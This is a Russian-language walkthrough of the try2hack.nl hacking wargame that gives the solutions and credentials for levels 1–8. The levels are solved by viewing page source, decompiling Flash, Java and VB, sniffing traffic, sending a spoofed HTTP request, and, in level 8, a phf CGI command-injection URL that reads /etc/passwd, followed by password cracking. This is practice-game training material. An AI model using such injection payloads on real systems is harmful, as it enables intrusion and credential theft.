Рабочая неделя кончилась вот и решил заняться :
Level1
View HTML
Passwd : hackerzzz
Next level: levvel2.html
========================================================
Level2
смотрим хетемель
находим там ссылку на флеш и качаем файл FlashLevel2.swf
смотрим фаром и видим:
txtUsername –
Try2Hack I–
txtPassword –
NokiaIsGood Iќ ѓ LLeVeLL3.html
видим, что пароль и логин у нас
Username:Try2Hack
Password:NokiaIsGood
Next level:LLeVeLL3.html
========================================================
Level3
Долго парился не потому что сложно а потому что смотрел невнимательно :(
а там все просто - смотрим хтм и видим:
<SCRIPT src="JavaScript"></SCRIPT>
<SCRIPT language="JavaScript">
.........
качаем файл http://www.try2hack.nl/JavaScript а там видим:
-
PASSWORD = "TheCorrectAnswer";
CORRECTSITE = "thelevel4.html";
WRONGSITE = "http://www.disney.com";
-
========================================================
Level4
Свиду показалось сложно т.к. я на знаю Java, но эт токо свиду
берем JavaDecompiller смотрим, что получилось
я юзал DJ Java Decompiller v2.9.9.61 by 2000 Atanas Neshkov прикольная прога
скачать мона отсюда: http://members.fortunecity.com/neshkov/dj.html
видим строчку:
-
infile = new String("level4");
-
http://www.try2hack.nl/level4
пробуем открыть и видим:
-
5_level_5.html
Try2Hack
AppletsAreEasy
-
логин : Try2Hack
пароль : AppletsAreEasy
и next level : 5_level_5.html
========================================================
Levek 5
Берем декомпилятор VB я скачал с http://dore.ru
видим примерно вот такую хрень
-
Const mc001A ="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,:;-*+=~!_$#@()[]{}<\/>"
Const mc001E = "http://www.try2hack.f2s.com/login-level6.html"
Const mc0022 = " txtUsername=AlmostAHacker " |Обмануть хотели :)
Const mc0026 = " txtPassword=ZqrE01A2d " |
Sub cmdLogin_Click ()
Dim l003C As String
Dim l003E As Variant
If txtUsername <> Mid(mc001A, 56, 1) & Mid(mc001A, 28, 1) & Mid(mc001A, 35, 1) & Mid(mc001A, 3, 1) & Mid(mc001A, 44, 1) & Mid(mc001A, 11, 1) & Mid(mc001A, 13, 1) & Mid(mc001A, 21, 1) Then
MsgBox "Username not accepted."
Exit Sub
End If
If txtPassword <> Mid(mc001A, 51, 1) & Mid(mc001A, 31, 1) & Mid(mc001A, 30, 1) & Mid(mc001A, 51, 1) & Mid(mc001A, 16, 1) & Mid(mc001A, 45, 1) & Mid(mc001A, 24, 1) & Mid(mc001A, 29, 1) & Mid(mc001A, 26, 1) & Mid(mc001A, 19, 1) & Mid(mc001A, 28, 1) & Mid(mc001A, 11, 1) & Mid(mc001A, 30, 1) & Mid(mc001A, 19, 1) & Mid(mc001A, 25, 1) & Mid(mc001A, 24, 1) Then
MsgBox "Username/Password don't match."
Else
MsgBox "User logged in !"
l003C$ = Left$(mc001E, 28) & Mid(mc001A, 22, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 15, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 32, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 15, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 22, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 7, 1) & Mid(mc001A, 63, 1) & Mid(mc001A, 18, 1) & Mid(mc001A, 30, 1) & Mid(mc001A, 23, 1) & Mid(mc001A, 22, 1)
MsgBox "For Windows NT / Windows 2000 users :" & Chr$(13) & Chr$(10) & Chr$(13) & Chr$(10) & l003C$
l003E = Shell("start " & l003C$)
End If
End Sub
-
хоть бейсика и не знаю, но интуитивно понято, что функция Mid возвращает символы из
строки а оператор '&' их склеивает. Пишим прогу на паскале (можно и самому подсчитать, но впадлу):
---
const
c : string ='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,:;-*+=~!_$#@()[]{}<\/>';
var
s : string;
begin
write('Username:');
s:=c[56]+c[28]+c[35]+c[3]+c[44]+c[11]+c[13]+c[21];
writeln(s);
write('Password:');
s:=c[51]+c[31]+c[30]+c[51]+c[16]+c[45]+c[24]+c[29]+c[26]+c[19]+c[28]+c[11]+c[30]+c[19]+c[25]+c[24];
writeln(s);
write('Next Level : http://www.try2hack.nl/');
s:=c[22]+c[67]+c[15]+c[67]+c[32]+c[67]+c[15]+c[67]+c[22]+c[67]+c[7]+c[63]+c[18]+c[30]+c[23]+c[22];
writeln(s);
end.
---
Компилим, запускаем и нам вываливает:
Username:Try2Hack
Password:OutOfInspiration
Next Level : http://www.try2hack.nl/l-e-v-e-l-6.html
=================
Level 6
Берем снифер. Я брал Ethernal. Снифаем и видим что идет GET запрос к файлу
http://www.try2hack.nl/p.lv6
там видим следующие:
---
(ENCRYPTION TYPE)
B*C*N**N
(USERNAME)
ababa abbab baaaa aaabb
(PASSWORD)
ababa aaaaa abbaa abbba aaaaa baaaa baaba babba
(PAGE)
ababa aabaa baabb aabaa ababa baaab aabaa baabb aabaa abbaa
---
L:LORD
P:LANPARTY
трейсить VB в сайсе квалификации не хватает :(
в криптографии не силен, но после долгих поисков была найдена данная ссылка:
http://tools.100mbit.nl/decrypt.php
---
=================
Level 7
После 6-го прямо халява :)
телнетимся на 80 порт сайта и скармливаем ему нечто типа
---
GET /cgi-bin/level7.pl HTTP/1.1
Accept:/ Referer: http://www.microsoft.com/ms.htm
Accept-Language: ru
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.72; UNIX/LINUX)
Host: www.try2hack.nl
Connection: Keep-Alive
---
и получаем следующие сообщение (теги выдрал):
Browser check : OK
OS check : OK
Link check : OK
Nextlevel : http://www.try2hack.nl/Level-8.html
Password for the messageboard is : TonyHawk2
===========
Level 8
Полная халява юзишь эксплоит и получаем пароль
http://www.try2hack.nl/cgi-bin/phf.cgi?Qalias=x%0a/bin/cat%20/etc/passwd
причем только Qalias хотя в некоторых багатрахах QALIAS
ну и рипером потом :)
L: BuiZe
P: arsanik
входим и получаем:
User "BuiZe" logged in.
New message for BuiZe :
Level 8 completed !
Go to irc.quakenet.org and join #try2hack
There type /msg bofh begin
===========
Level 9
так и не посмотрел у них на канале бот сдох уже давненько :(
ЗЫ: в принципе просто все кроме 6-го уровня (мне так показалось)
|